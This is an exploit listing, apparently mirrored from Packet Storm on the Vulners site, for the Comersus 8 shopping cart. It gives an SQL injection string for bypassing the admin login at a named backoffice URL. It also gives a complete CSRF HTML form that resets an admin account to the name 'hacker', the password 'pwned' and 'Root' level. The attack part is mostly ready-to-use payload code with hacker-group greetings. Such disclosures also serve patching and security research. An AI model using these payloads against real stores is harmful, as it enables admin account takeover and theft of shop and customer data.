Lucene search
K

Comersus 8 Shopping Cart Cross Site Request Forgery / SQL Injection

🗓️ 03 May 2010 00:00:00Reported by Sid3 effectsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 40 Views

Comersus 8 Shopping Cart SQL Injection and CSRF Vulnerabilit

Code
`# Exploit Title:SQL Injection and CSRF Vulnerability in Comersus 8 Shopping Cart  
# Version: Web Application  
# vendor :http://www.comersus.com/index.html  
# Date: 1 apr,2010  
# Author:Sid3^effects  
# Code :  
--------------------------------------------------------------------------------------  
#####################Sid3^effects aKa HaRi##################################  
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]  
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR  
#ShouTZ:kedar,dec0d3r,41.w4r10r   
#Catch us at www.andhrahackers.com or www.teamicw.in  
############################################################################  
  
Description :  
Top Rated free ASP Shopping Cart since year 2000 with Web Control Panel and StoreFront. Simple 3 Step Checkout, new template with CSS snippet based, SEO friendly, taxes, PayPal Standard, unlimited shipping rules, multilanguage, stock, RC4 encryption, auctions, reviews, order tracking, multilevel categories, digital goods distribution (serials, links, images, mp3). Optional Packs with Google Checkout, 2Checkout, PayPal Pro, UPS, USPS, DHL, SQL, mySQL, DES encryption, WAP catalog, YouTube Integration, sales forecasting, Java charts, Image Zoom, antifraud and more.  
  
  
############################################################################  
  
Xploit : (Auth Bypass) SQL Injection  
  
  
By using the combo ' or 1=1 or ''=' the attacker can login   
  
DEMO URL :  
  
http://www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_index.asp  
  
############################################################################  
  
Xploit : CSRF Vulnerability  
  
The Comersus 8 Shopping Cart is vulnerable to CSRF.The attacker can modify the options which are available.  
  
DEMO : TO change the admin login details and other info..  
  
#################################################  
<html>  
<body>  
<title> Comersus 8 Shopping Cart CSRF ATTACK </title>  
<center>  
<font face="courier new"size="6">  
Comersus 8 Shopping Cart CSRF ATTACK  
<br> www.andhrahackers.com  
</center>  
<form method="post" name="modCust" action="http://www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_modifyUserForm.asp?idAdmin=14">  
<table width="421" border="0">   
<tr>   
  
</tr>  
<tr>   
<td width="168">Name</td>  
<td width="220">   
<input type=text name=Name value="hacker">  
</td>  
</tr>   
  
<tr>   
<td width="168"><strong>Password</strong></td>  
<td width="220">   
<input type=text name=password value="pwned">   
  
</td>  
</tr>  
<tr>   
<td width="168">Store</td>  
<td width="220">   
  
<input type=text name=store value="English">   
  
  
</td>  
</tr>  
<tr>   
<td width="168">Admin Level</td>  
<td width="220">   
<input type=text name=Adminlevel value="Root">  
</td>  
</tr>  
<td width="168">&nbsp;</td>  
<td width="220">&nbsp;</td>  
</tr>  
<tr>   
<td colspan="2">   
<input type="submit" name="Modify" value="Modify">   
</td>  
</tr>  
</table>  
</form>   
</body>   
</html>  
  
###########################################################################################  
  
#Sid3^effects  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation